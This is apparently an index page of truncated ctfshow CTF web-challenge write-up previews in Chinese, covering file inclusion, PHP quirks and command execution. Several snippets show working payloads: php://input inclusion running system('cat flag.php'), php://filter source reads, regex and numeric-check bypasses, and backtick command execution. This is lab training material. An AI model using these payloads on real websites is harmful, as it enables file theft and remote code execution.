> > WEB入门之文件上传(完结) feiyu 链接:https://pan.baidu.com/s/1YGj8gl-7mpRTE5TlFbK4BQ 提取码:feiy
1024杯 web签到
> > 1024杯 web签到 admin ?f=phpinfo 可以看到ctfshow_1024 support ,调用即可
web入门133
> > web入门133 Firebasky https://blog.csdn.net/qq_46091464/article/details/109095382
php特性-web91
> > php特性-web91 dust payload:?cmd=%0aphp preg_match('/php$/im', $a)) 多行匹配 (preg_match('/php$/i...
php特性-web90
> > php特性-web90 dust 科学计数法 payload:?num=4476.0e1 十六进制写法 ?num=0x117c 八进制写法: ?num=010574 其它姿势,欢迎...
web入门-web79
> > web入门-web79 dust /?file=pHp://input postdata: <?php system('cat flag.php'); ?> str_r...
web入门-web78
> > web入门-web78 dust payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php ...
ctfshow web入门 命令执行+web90-97
> > ctfshow web入门 命令执行+web90-97 hdxw 命令执行通关playload 实际上是代码执行,用代码读目录和文件内容 参考:https://www.php.ne...
web入门之命令执行
> > web入门之命令执行 Firebasky 命令执行 by Firebasky web29 echo `nl fl''ag.php`; 查看源代码 web30 echo `nl ...
ctfshow web入门58-77(命令执行 bypass禁用函数和访问目录)
> > ctfshow web入门58-77(命令执行 bypass禁用函数和访问目录) Firebasky 1. web58-65 payload:c=show_source('flag...
CTFSHOW 萌新计划web9-15
> > CTFSHOW 萌新计划web9-15 _yu_ 题目地址:http://ctf.show 0x01 web9 乍一看别被迷惑了,这个正则是字符串中包含 system、exec、h...
ctfshow web入门 命令执行部分 (37-40)
> > ctfshow web入门 命令执行部分 (37-40) _yu_ 因为是倒着做的,导致一些payload可以通杀,不利于萌新学习。希望各位给出一些其他的方法。 37 同39 38...
125